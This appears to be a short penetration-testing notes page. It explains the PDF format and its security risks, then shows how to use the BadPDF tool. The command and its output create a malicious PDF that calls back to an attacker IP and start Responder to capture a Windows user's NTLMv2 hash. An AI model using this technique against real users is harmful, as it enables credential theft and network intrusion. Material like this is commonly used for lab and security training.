PDF

The PDF file type, short for Portable Document Format, is a platform-independent standard developed to present documents consistently across different systems, regardless of hardware, operating system, or software environment. A PDF encapsulates text, images, vector graphics, annotations, form fields, and metadata into a single file, preserving layout and design exactly as intended. This consistency has made PDF the dominant format for electronic documents in business, legal, academic, and government contexts.

Internally, a PDF is structured around a sequence of objects defined in a self-describing syntax, managed by a cross-reference table that enables random access to its contents. The format supports advanced features such as embedded fonts, digital signatures, encryption, JavaScript, and interactive elements like forms and multimedia. While these capabilities make PDFs highly flexible, they also introduce security concerns. Embedded scripts, file attachments, and poorly implemented parser logic have historically been leveraged to deliver malicious content or trigger vulnerabilities.

BadPDF

For Windows targets, we can create and upload a malicious PDF file and attempt to steal the user's NTMLv2 hash using badpdf.py:

$ sudo python2 badpdf.py                                                                                                                                                                                                                   

Responder detected :/usr/sbin/responder
Please enter Bad-PDF host IP: 
10.10.14.2
Please enter output file name: 
malicious.pdf
Please enter the interface name to listen(Default eth0): 
tun0
[*] Starting Process.. [*]
Bad PDF malicious.pdf created